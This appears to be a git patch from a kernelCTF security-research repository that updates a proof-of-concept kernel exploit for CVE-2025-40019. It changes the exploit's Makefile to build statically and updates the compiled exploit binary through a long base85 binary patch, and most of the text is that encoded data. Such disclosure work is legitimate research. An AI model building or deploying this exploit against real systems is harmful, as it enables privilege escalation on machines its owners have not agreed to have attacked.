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 From 4a3c42b818288b648f377eec88c8855e5a47b2ae Mon Sep 17 00:00:00 2001 From: Shinkurt <9161100+Shinkurt@users.noreply.github.com> Date: Sat, 9 May 2026 12:50:47 -0400 Subject: [PATCH 6/9] Improve exp505 repro path and PUD probing --- .../exploit/mitigation-v4-6.12/Makefile | 12 ++---------- .../exploit/mitigation-v4-6.12/exploit | Bin 36568 -> 39632 bytes .../exploit/mitigation-v4-6.12/exploit.c | 18 ++++++++++-------- 3 files changed, 12 insertions(+), 18 deletions(-) diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile index ec8aab1f4..d01601dfd 100644 --- a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -1,19 +1,11 @@ CC ?= gcc CFLAGS ?= -O2 -g -w -DMIT_612 -LDFLAGS ?= -ROOT_EXPLOIT ?= ../../../../../../exploit +LDFLAGS ?= -static all: exploit exploit: exploit.c - @if [ "$@" = "exploit_debug" ]; then \ - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ - elif [ -f "$(ROOT_EXPLOIT)" ]; then \ - cp "$(ROOT_EXPLOIT)" $@; \ - chmod +x $@; \ - else \ - $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS); \ - fi + $(CC) -B/usr/bin/ $(CFLAGS) -o $@ $< $(LDFLAGS) clean: rm -f exploit exploit_debug diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit index a0ed302b062b613182396a66bccdb87344f9f6f9..30afd6443cd57cc06efda75b3e9ff0683763d8b2 100755 GIT binary patch delta 13818 zcmb7L3tUvyy5D=4k&%EszVQhvn2$6d>0pX7I+J^JFiXwKG)=|oq!7-eR<;Lcrr3>B zs#-& zHV5C;)NIuh#&v8Q%CHRnGAY4d;hNV6FKU0Xw^};+`Ul+}ZVVN|tYLWH5|t?o8G~9T zeeLked_yf~ZVj0T!DAW~@0U8TaS1)tLSqk=DGXgInsG@Mc6wxs`X?o8x(#4jxSRe$ zR02#m57sy>6{XE=f+60}p<}1cUAlIQ>)xYhuiky68aCOG_4wEcg`4d)pS^#k*NS!0 z?W;6*L8{BZunz7fAw_kVhys}y5wdq3eLbi0?|FNqQk4*6D08 zaZ9c)bw6pk?ZeYYatsWsiO}lWMe5r}-4-1aTa>GbW!vZ8Ie%&H(>YJtq!%N+QkM3P zqA#>LIw@A0G$?6a!V~rd^M_8JW=fblXVJVT=gqOrUp#EsuqbB6;F$@N^Ku@4a?yf> zq-sHGQt%kg{4IkVqVopB^Rp-61GVvy4)?KEmMo@U$`|)eD2ot|4lwjKWD!| zkHGkss)z+4LYU!Z7*-JG3zu((AB7x!E2OtN1Y`fS0s_PAxQX!kP35qGa0Ik&)!|P= zio>vT2%i*!@8|wGUzJzI?|c;y_L*eL;4e(L8D@p(>q4+o2tM_{$la_bTs{|a;AO}c zb&fm63N&SK_+@rtn00`;!x*LpkjZD5O90253}b?i31FNDm<#9vYy{j0$h-`Gz(T-F zfa?G|W3H+JOs6@kfMFg5%mj1*&IViu*a+y?Fw#3cl7uxK8D?-#@ET(cFKNcbw43aV zT-na6dsX{dL_}p=bfn%G-463)B3P{Wtr^NN2C^OI=baIn1FdWf50VW(#=$WA$%ims zL}xa{rTH|JnHL=?DC#u}!=#*0h6iMrUXb_Ww|WJ`qyV-mGdm*|fP?7A@Y@3VWWZLs zW}+fbPE#YF1pWE8bc<7|pk|?<@G%J>4g}*UMEth4UXOQbUyX=pA=i}%fM=kaVP0yh zO!GXb6eY8wEDkgq_zJ<-zAYc}3HTL)<^pX9(dJJIg?+3uVmibtDpjT}Aq5K4U+^3R z&sr!NL5d#zpL!@dSHM%^mS*+tdOsC=p>8D*K|B~{c}PTKgyBl&4xmPXJ`k0A3}UUp zw1=vvc_f^vMuuUeXL`p85w$JXc<0GRnKXL-#(SsheaXWZc6;swhBcP_G>Ku&Db@9- zuq1!o=5HD=o-$51K4_d~oH~Wi|95&S!|>t-qj-(?WV|f5w4^kZQahwn%MWCLp=Ix&p7O(#*NM5%BL{%c_ zE&(IO41{%uK^GN`L3b7K4-vkk8^{rq6WtrY5mfj(0}*s@Mj4q9lU8N&D@-LwRi>&N zm?$>TbWl*ZYLHU*47!gYhtUd$1@}qhdGA)LiaDi8Jc`;62bV<*n%ym2!N6_^k0**@ zP2#nb+7!RM7agfAvxL!nGkd7ts28Q`zhAJ>{)BRirxBf^=3&16~ z4?7fqyW-2lAe%LgYoksS{ zBJ>&RE5#`M|E*(DmI}w0L3pi2}+-Tw*YbH2I>yi z01Q%Mkj>@jzTF$@)Cfcg8Evp<598up$f36JCPaZN-d=bc1}axv5Q3{hu!vx0>JGO9 z(wPN26s@T%-T5dMtaN_>khUN`K6&v}0oSf=@2?bs>7nqWTbC$qw>88}J zF9U@ttuFxNirpeWfq4g4yz>>6@Pv4k}n` zAC<2l%g+^;D@bajFme~7dlgt$+Q)=_Syef0KTvDa))VS&LV@c5P&?B80aRvcsX$0G zS6r(o{3npc)K>^skhLG^{cv+f8qIg+)Y1^EAGp4;bkorkj1%f@TfGf_b;>D~gaI8(+q^Mh~NW$@IAXlb+ z3ZzN(kt?>Bz{Kjb&w#Uf=2sb0SF2{GRgqH&)U;h_jHHRw2wdG2F{>n-TNKFVjvmYA z8cqWx{36;5fcrL^d*+-Typ-Yj<$=L%{uT8ptvErLST$`LRe0>jS&Oq@d9f+{udoB?(Z zhp0c1<~mS!hpBPdW-jL|vR_U1VfC3BJ$lZc={^X-au8rRuaVS#1GQA8!yu3Z5rjs? z;XgpS1b;5$_Xn)z)lg0ADyjdeoX<2;bP%SaRS>7jwCW{y4?^$|2nd}@P(0m7p4O13 z``~y(4Gh-CamD8StvXSERVlC_|A|r%;B*_M6#1imQmV88s(7{*F3;NwRL)V@IeQYh zd8a8<=aD;mk#fyMxC}ldX6{Ng><%6HRf|CV;(J2xMUrz2%9==7Be6G<^m)o%qFj*J zn!$nJm0D%z0Z!Do4()TcoYdBVukI8{{0vkzY1%`2e?)Qx{i6ur;dWC(1Muus2vCzlCz7uS^)uLVdUxBSOu%Rrp#DQd#XeOS?j!!f z8;#d!&VToU0^H{Tl&RlMcv^6<9-KoK>IAO=>k=}Le+_%J$jqkp%?%tl&*l0PFCf`Z z@stkF%2%jxUa(;&~OP$E~$bGoBFD7eLoex+aHj3nhP82$6r>AzOnhL!r6%F zL^N-qxk5B=rr|A`H)1Y8X#+sHXr{%C%dT|$u_UlDIirLqT`%#>Jy;x}S zEUW>_6h?_hP`Y~`2Ik{lIAJ_e*`=V~yP(Op|9lK@=}j}emgS3nA3><_@2#EZ%q>jxYL zlrz>~#aIw~WI8R83S_G&3#TvuFlh;HI=m3{hajDXs7%{;g5e`s_=tAH(G2x(J&P%v zw?2wx!tVd$C>AO>uc6WYnr}}l-w#o!|6enH z*vk0nEfqf3%JPuE42JsO$N6z-W_KAQ$9^AU+gXUe(VsA3}Okx)Js*n z!i^#PqLp#?O^i44z0%6}?k)KqZ{@T9IiC<}yL(z0v;Leh#MiNvFX@(izoLJsec>t& zZf$FPV?~7WR>tpd$@q3F-zM;x#oxj@>98EqiHjOJua$2V9JG2j(KLa{U$?MAfy$(f z*`79ASyfnnbE_xQiiF7@JE@$Q)8)igNBg*GTe7*u=dp4e#q!-iYnbjWm5ThLX`6|f z3@YTX6Nc=Uf$OpxiJIP4c3~UY4Oo+EO`r;`!tb{+jLrAr=Jsuc`>LuH!yiDE?g`B)u}y7H^o%rf zP%mLYYZHFZj$tN=v$6C6N?xxmh<8v%$(zH$HkR%7i-DK1u2thab7Xl zH#Wri-lXfj_Y)x>bSd%--R(DguipC|MEyhee(5l;%&nj5+TQ!k4%KjS2xbCejmiap z9fmXLKE`H;?o_C%UKNOLVh_3>Ldt^6DsCb@LH83#AAqZ?nR*p_QrR2By$LRHZQak)p;}h-#2Sz0ePN(win4gp|y@oJ(+%D2%E|eY~(o?vG#oQw9;=Lu* zluCQbAH^zj1TD#>Y6G85X_7M@!!0wer*OyQB6A4P$GRuL!v|fuTtGEwAM2KeaE>;( zf)K8-4Q>tcxM_3g$PfwRYAKV?pf?Wt$Kg&q88xC#Iy(eu)KF6bs6K2W4zwB}pagRp zvEXVH>$Vm9r&`&8>XhoC)heDwJ)WIKjg)D`A9X8>=t^vapfTu5qBIBxedIc+^oj!L#yrx*p-ma1TjTu8dVP#6er3 zFhyt~jB@cA=EacKhR5<}J}V6c30Ip|PsSwN{8_~oc`B~mQ9*V0mH@-bt?pd3q;jiE zcOJOejm1n)H@o-HU0Ud7w;VUWq@g1;WVugrE@1$woKole5*03^PKQzXUWn;8ye$}u z*&C)J-s3u~3~0CC9?d%|a25E6!Cv1mh4&WDMsLK>dY}x|>)^;m2^Z|TyHG?Yb`Ui? z=x_i`ChvXi=*C%~4ezj!!53i=`Z(S@gSEfe(9hUZ$=Z7Pu#aNpRf*Vhougaf3Yf%ouw z-&D+X;t^amqJon`yzhY*mp}Gr!ja--fn+BMeR23m6$>5w;=I3DBAUSM5qs< zSavCrVH={$ZX=*8tH9Yr2{=?g7>Vg+E#c4LIR_6x*c&qP0LOGR*%yd7w$k)maUN{w z#lB)f9RaEu$itF{Awt8*$;kWq zQwKVY?xN-nQ?48*NqHY~cu;7MrKM~RysjUPx|a>0++fOm+Kv&}`UJ|pMaZs{TaMb) zM&%O~KNdmwHa@6Z1SGl0 zdrXOwK^Uws)!FsDXKi8}NW8nQWDaIIY)mRZuZ18$#Ug2X$}~;qa_Q5QL7ItL=}^i5 z&EQ26n>tZ5$|_AtooHTQp;|1x&mLK+TLG8Y;5g-lz2rxj^F4t_GfpRtOXh>l4M1d; zG8*3NEFf1z6?k;R7fMG`Z;u}dX$(H=khBrV@$4mDmyWPo`c`7z?z&J)ylX(0;s-H$ zJY%ro(Pz0^?BDYq-G!&6$L>njeDIX?`dtfz^rz?)f2g6Fch}l7_=vFvRKxQW^m!&E z@M27XlFb{4Vls*%6@$7yPs4HYDX9D7?+lv@uN%7Xo|vZ;?z9;S(3uFZjr_%fy!ZYV zzHd3tp6A6b8H5(Q+)JQ`^K#@81Jn#f3C9U$J0&o*{qNH2!#hX51MR+bCDO*>ud~yo z(P@KCo5AR#@2bkqqKnf|#9jy!oGo6#;z^4af0PU35zJ1QWy*+Ej=@JhDVU*l>1P;c z)w`sPX`l2(ue|<{%!`-!{1&#cr6sS+6!8Speb~>6My2=Eu#)u9 zJwr6h?kjTNvw~%Rmh_|in#bl!dq$9G_oT7L~vpX5dpI-uptLwrrYK z8k#ws&6eDmgV<5hXPGlKvw11j_#W$*HW^2f%3qB=ZzJF20e54})=7r3y)^zurD0>^ zA}jAjFu{^F_I`Ge^#0iS>=Tl1-0keKqM_rGST?q3ifI6=Dg01+-rR@1UwYe|#}-O4 z_s-}Zi)S8X7Efv6bQmVhCD^;*WjI#Kzjr{i1J)F3{lsxn(Y<3j5W>h_;>Suy$EUJ~q>lU` zs!j&qgTTZ51a`diF+YjDBwgUgMW4YU%-Hhq6~M`<(pXDg^lJ|gA{L039+3Q&CiYEf z+k}mpw?-GupSYP73MnFs2V)ny2DyhTe1xdi;bV$v%0~xNr&z>m@@J=8T0H6UcTk0% zml@2NYj7iw-&*WC`ZivX-%3^HRf^706Ee4>DYcx7WGq#a9(#TaKv2CP* zwVk@HRTM7bx<`(q37rtWdq9%cBTP6cp#};Kwx`eM5w~=E%$cMEso4@NI zG*)q!;);Ql_Egl$EE`=@I(zdkMXnEF-wBuR`c+llhqMWo(lv zzifQbH&gfM*f?p;BmZW*N$wf_Bmar5K*{9ZM|HJ?RDa~>VvYb&8PBjGs{-XN`s zOB;IZq+U_-MTE5L(R7Vrh;;2ytLE{Ql67W3&71E_xig1#nTZLY+t@{6^jH&T*WZq1R{SOlx8i-JJ+pgjUeihSv-_~8B>kLTq<6ra z4J@Ek^LWo5B;}*MQ2jmFV)7RcQFUe;ePGkgZDKWZoYK{Kx@ zj|fSgzgr``DSei0)(m`8YRdk%hS3zATyUH;7X_cZm(@hBlDNN5(0uiJ(Tu-4w3-)n zMTc_&EWvfpNG!We8ou~*Hm>NG#WKsjSM;5IBm1|Uo!H$lGzIWMKbA^mMW}csX7xaZ zbyah&)u7PubENnixzD?~s+VE%eRiPq#gd)TRpl7?%faBQDld9|X^KYUSR{S=+&h|C zNz%mUYc$>aNxffi_WlTQFPnozrke>~43sQ+lffFueIB!{ue9@p;hK^Ci!Quyr-qG^ z`U@{=JUS^+=qv3KzKgeD>Eq{Kk^@_@h>L!c=vNl3nV2|_%6I6CzHmIm3hI|nw4K9( z&AEP{wsJNna4%_)Ykl>c?Wb2DoaS@=rWAiRPV_m^?Xo#r72b&s1k5=Q;-+SXx-?h;logs?Pdxgp8btSF#*k-CU(MP=iNgt}eziU&?e%N(k^G zr&fZP7T(0vo0xd%tV<_&O)U0RA*-!5Z}Sz~*Xjn{`R_P%0wTH>bgic|Y6;zcZV@arI)%DIBE z<1ruPM^y0K*b2w;W4NI+RnSDzJ*7JQK~QJTSkO5Z=R$$yM+EYI;|EpPx?0&r;>ctw zwR&{j07!@OF3<-tR4;WIQtGBSpqMu}n^|tP-`SkRNdbMpmPB7VMeyQix$;vQ&|Oi< z6o36UsO$}A*dWUlkH@2Bm03;=z@{k$`XD<3~(4>yz(%ILND z9G81=s{;PxI+MQIae1k|KM2z`0(doM?;|yz8;p)WqVn!EI!+ulI?8=UM{~Qpz8A|c zBINdHqa#rBx!&lw9F-S!-5p*Ga>dsUdQn< zM(2q!R_}e-6)R29RKeN}5cCOjmb+^0Gw}Sm zk7sMRRps0&^D$s7aGJi-=|H9}XsEFHe;LIejE-MWfl5^1T93Rn4I|W3COF?$Obv3B zgNsb%z17g4e~Q}6D#pq^Hc@-wW+FTRH^f6ThWvNoCdG`2Rl@A@t7~5sdW8YKBGlih zPt+|m)XC4;>y{tmwwYz#Gwm2YNeo=vdoj?0n-!@~!E8bNTifwLLh?HsTUtUxrUV-$ zhSQ<5E@hQ&J_RSd3b{WxF4l>0ID4uKLwJytQ2+X${1-m?3w~ah+fqUoDv%Ka7?kd6 z7~-9muh=e=FJ$g3dFx+^t7AE|Kq>9$cp;L-O=~7=|6QpU9ahjImto1~#RITmaUP4b z#nZ5Iz$_zV77W+Z(6WrEvST(mzz_P4X9HL#^m%6TAf@*DIH92k{tlT1whk;M8cHH4 z(NdzLq#Y%Zyt7=-k2qkjX&YS%D(NJroXy;lp}bRQj#%=bvOF0vB)Q_)0zEJ8<@eTe z#iL>~3r68PA#2x`0;>Vj3}nVEnI`VtTkkw>;Jwc^!dK4Fj_ZJHJ#8%4L8}KG4VYg4 zE2^e4YQcB~j3!SzlZdUfHr6C+^`7X_VsyI4+EutBS`AlbR;YT!i`d6lz1nV=?&upl zZI+kEmwW-|@d%6aa>QaC9u68FK?tuHOEY1@GN>7twgJNIIhGq}>RL0F>tHeuR0BG-*5WMB%t8a~M*G|DvILH6ErTvk@Q%WS7&J`sYW48P04$8r z5(Hsx9Mu=H2J47w`x(vv)nu`8W(A{@=CIwgU2yJ}j*EA6{uLSc%A5$n4LFv7qnG3t zbKBDW*1z|*DWSC7mWPz`DlCrzA`OpSusjk-$^=p@A`fNR1u5lCOG&h@i%Cu6 z_BM@HF0AP4%I>E>QCSx(u%#5IXaNgYd!DZ@>Nn${kT%dHI!SkNi<= zYOk>=D{U*5kII^7Oj)*cefFyCrPk#eA9_e0s2SZkD?j(iRqI!zjFscNj4Yp}v1;Tg zT}F3H+ZpO+3arp4ZD;xOUHS_tnNLoeS+>h|;;(OB?)&_9dDxi^+mB9v`gVb9m9fj8 zFMgdXZ;u~nj|;V}_%(w)7zV?iSU~$N6x%;2pV{?AZR~{i zLJCsfm%n}B=k|HIA@p$me}=}q|IGit+DG__Yk#80&YfEyBK&Sm2u1|%hYYg_rrBzzAp^NhGEJ7(e8dd5j-*6?j6AL9=*@;c3O8m@IBO>LSxCrnu!1(8| zOaaRP-vWFU&?j)ixDQdG9pYm^E{fys01gK14gVMc#{*_Z$@zVT#{AHY<1Qr1f9%uC zeo2Vyq&39FU<(?Ib{6V6Dz^YRL)U~Cgz51y%o!!rbck^&U|I3K_7ulqkay*#Iis?| zVksbR!?y)8qX0W}&2UD)7_}5q9M>0Q`$s5lLFgUyyhAAJ&(tf`&{rTkpW(QPfE|2Q z$vRaDb(*Gr8)TN=E0f{WycqpblrUcvQ;nrU?j+=<-IcS)$85SQz#z~90h-4SW3%q^ zSAu^L{G@yN81)>8&}fRmZv{J@#QF|M;omZt( zz^7nvAsC#fcXUSh4fvtyqE56!<^p6o-z$SUb%uiHBzV2=<V z**De)?=a_uW`&x&f5AKpwB9{9c=vD7bG)H~GjY60SJ(6mCTt#)zB4Q^%s0$4JT{jV zUSc{rNLvij9p;`Kr38bz)=Jpobal!Vj0nWmi}w=GfM{^u5yaATIF-2tXL)9Ng9q2P0@Si&U`iP&{)|-nLL%+& z1r8Q4hQqY`DK;goQOZkTmBffv8CfY3O9C-9BuxW_^aQ^?jTVSsuSdr?F;Q=n8qwcm zOqW^mn_NM$cpG$JB;L!NIo>GU(bemG${zHzDr+Za7b;WG4sGg`{um>ZYFrJ^XqA&a zv8A}vygsy%zBWqN(54V=ssjU>vZ0T8GK;)`T$SqadSxxm9)B;^tEzy3GBK@X1Xq0*JOGQaJvRZnG4Cf&s=z%pxLu` z$)15xCfx<^5V#Q@G>k@c38-5z4L)VeXq;?;G0Fluon4LlozW z48JriHvG!)>%}#2gwE$Kb|6)fN;PUMIepR0*`8u+s-Vv4OFnXyV$3C_E)RfF+;<$` z>XI$47ei>hzGRQjKW03L*vi8cOzuM2bUTa|o0Z(2x1Zl?Ma*;*Zp5A5-eu0JON&^)kSiEv|gRwzxLi zNodR-*G7WHdt5Rg3;HmcNup~!R*ywGK+BBzUE2UKIu3&`b>$t$$}V-OELA)jgO3N7 zc|1$NqiKhHj+i^-3{ZW^-Zy~iOAfqBp!h%-+iDM?Dz)Um%fO5!uFWChRu$|eBHF(e z!iZ-qcBxp&-ruXd1AkO`2UM(huZorIl|#H&LcB2chY+R`OAfqw#jf@yMBV!)m`wUY z7c}X78REXU7fdCR11`@fj(foz^qHOQ(YA{$=x4!N<_t#LPU~9TlXmMqQa2)%cqiI+ znK>0+e0~sijU1zx>rvfc5OYt$7a9@1$PpV(T83=s|p|hlT)DI+O5F5^t*y~}jBv5j1L+%FTZW02!8|t;< zzP;p5h<*+Hu1P!D1d}EJ%rEXU)zAbU%~gb_>i-e?uc2WJzCVU-&RH^VpgRE~Iy+BAGlta=FDY9RCiwK-31+KJWOV;OTM`VSmW@!m zdL43gfDL2-(b(`65X9}#xnztv9g&JPHL3(cjX{HJ}5%Ft> zyGc%b@(v(;xdaO*&wuKgnCBbZf&ydCJDv)(t_WzIHAh^5p5*pBdz2z7w*~=L4O2^w zLTO$dwX6G<1TPbQk{Z@4!0RufA(mnTCLnMEcGc~XIqlWWP2b-L262j2yoOw;Y6~Sq zqOsXKU#lKjucuxhw@gr}FM!H|HOzT4!FJvoi+xv#8IJTLRo#)r;ig^Q zRg^^OaUK~YKl2>eekT}I(wBylgl{|1PJQ6q9qfO~&I*ATSocUJErGGB$Cz%Xf@2HrK8Y*nTW% zC$tRc-ED)cJn?-txk~Tf`v5LDnn`;{s_*FHOyZK#EtR7V%p-`%(8uhz& zfTbpEt_su=enDMJbbW+6##6~TFyed+h#`L|K8vR!FGIS(q*|m4J%%AGpab50V7n}i z>XrN~4m_Nc$Vy++;M(!A?ej4E9I@BT>|p1G*=~3|7&KH+YN2a2N;hj4&}18zpHa$Dr0`rc65X@6dtDJ$x!$m&ikpRq6>y94tZy$X#6o#`T^-q6+NF> zq>Gi5BJUqVO)4OYW3o=^38OP5{bMtJf+Lt{T0gT)2TgcARGaF(tiocI3$>QxVqM$ZjWZ7A_4SNvPz zZ^uj~XilifhpSALK%RJS-cPrIaNe(`{r84YDtHxY=C4Mt^hO#9s}}=Uh9Zw11j#jl z$~PD>)#l;gS{Mv2LkMPpJ{aPD*Amp=H7rTfE(BOMP@~j_Zf49 zVrr|RikjUTD#)a=7rDAR_H>|bQ?X>)B_AEz$No|r-7O9?PX*13IyuTXgpkGaHti9W z;n~u)Dk~OqoSKqaq@9{#@R+|yLo#HFIeiIivK9ldom1WV2F0B?d^#53bS%Iq=AWJh zIn4aB1po9TdILZ%ZL~{p;@23-TG*_l_7>?XjNSYtbXMpM_@I$lay6rY!SA{Sa1O)w zzNIGKR}d4MFz*&=O^SbdDz$fS+7;6HJ~a9%$hevAqVFhr#VU?>QNPT=L*~L;6u)-t zcpp&o_~2=ad(@&cl%-x(3UU3=HH3Dq6sRC~*C}PHvuaJQ)@M2?)3AEoN#1_Qkd0ES z^d-8|GDz*eG99fg?&T*kT^GcnLNxcrl8s-I4JaQBb~$dstux(rtyo3s$qj>l{33yR2&nL^F5aBg~z^ z+)V4;r!L1<*=?p9U23uT^ z6;@-N`EFV~>b1ZuiQa;c1*W?5oq-{Lwc#%7-t>tY&bVwT6>~WbuC)$Qa@F{^^;T{? z3S$-;;th05=VMYdwhGV?FPstpH}He^TjGD*pW~XwUc<4pE{5anfw-z6fB{X_6P-9- z701{n;q5O#37cYh8k+_Am;h=d^4)q&^*(Ja-5iIrqu zrN5)n{Si9+OLV(Wc`2lYBCJ&zIY&JU)#a=72O>49mvW^W>fY|;%{r{)P|ZuV4{?aA zs~b1ltJv+TYH(IJjl&wLDyG^9swH43O(|5nNwf#3)<`sa9ID>#biD7yn@-4G?~)n} zj&Hhx#Ztv#PMYYHpf?+OtJ#LWGwF`H&No$vi8C(Y`yjr3@r}dxmVd@1$Z$FS8Ol)3 zKjZtQ%a>+XP6b8jJ|9+a0q3eGOo*899CkYK(7Z z8ajW>18Xhr$-Cek#y3pf*DNn%LFoH+9Lcxwwks9q4qRCv(To zSEa|#P=O|m0N>2oPBYJ(ARBm)@zqY}*W7JneGWg`TDZEU{KW|o^->#&*FP0Yxsa|lWc z6HregtrmCutY4Bpe>*t3$`mEX&s@N-mY2^Q&gL!^7gr{{5biQ$94);lgmx>cJcP@3qM_ybGRKd9MG))QY3%nRn0o^7SW1Em{RKO^9ko!R7j%38^9?IWYY? z(F+XD$x|R6YaK-6z{XAE0I+t8i~~q57mKv24-KSnQGX%z{qjF8S|A9q%j6r2Urk0uoBtnCa9XNkcJvG3Nl^1?Tz^4ay%V|SLS zPbWk0SBDX~uM58yz!9~S;52zXELD_``y zP7unTmR~ITgE0GN@<`VSflrZdyPW+>;PYkS7sd%A z2bO>K!f1itFGoqw@eiXMB)=scAJ7G-AY0b1RPV)cF8PcSp4@R*Eyljts9fn(zPV%} zZ&#Byq}9PifhP4=x%qRM^AZkrXWkb7 zR%hnxERwd#LuRGpu&gytJSjR~xX;KDboRMu8iT6dXDaepSJF7i#IgBpHgp{Wf@%+hts#G_Vm+Jv~SVi8^J&B5xxCA<>S4_RE(DKdm7{q^hAUZRJM=xIaz 